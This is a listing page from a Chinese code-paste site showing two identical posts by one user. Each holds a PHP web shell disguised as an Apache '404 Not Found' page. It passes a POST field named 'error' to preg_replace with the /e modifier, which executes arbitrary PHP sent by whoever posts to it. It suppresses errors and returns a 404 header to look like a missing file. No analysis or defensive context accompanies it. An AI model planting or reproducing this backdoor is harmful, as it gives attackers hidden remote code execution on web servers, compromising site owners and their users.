首页    新闻    小组    威客    人才    下载    博客    代码贴    在线编程    论坛
代码贴JYF789JKL的代码贴全部
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> 
<html><head> 
<title>404 Not Found</title> 
</head><body> 
<h1>Not Found</h1> 
<p>The requested URL was not found on this server.</p> 
</body></html> 
<?php 
@preg_replace("/[pageerror]/e",$_POST['error'],"saft"); 
header('HTTP/1.1 404 Not Found'); 
?>
阅读全部 | 2019年7月5日 16:05
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> 
<html><head> 
<title>404 Not Found</title> 
</head><body> 
<h1>Not Found</h1> 
<p>The requested URL was not found on this server.</p> 
</body></html> 
<?php 
@preg_replace("/[pageerror]/e",$_POST['error'],"saft"); 
header('HTTP/1.1 404 Not Found'); 
?>
阅读全部 | 2019年7月5日 15:30
1
JYF789JKL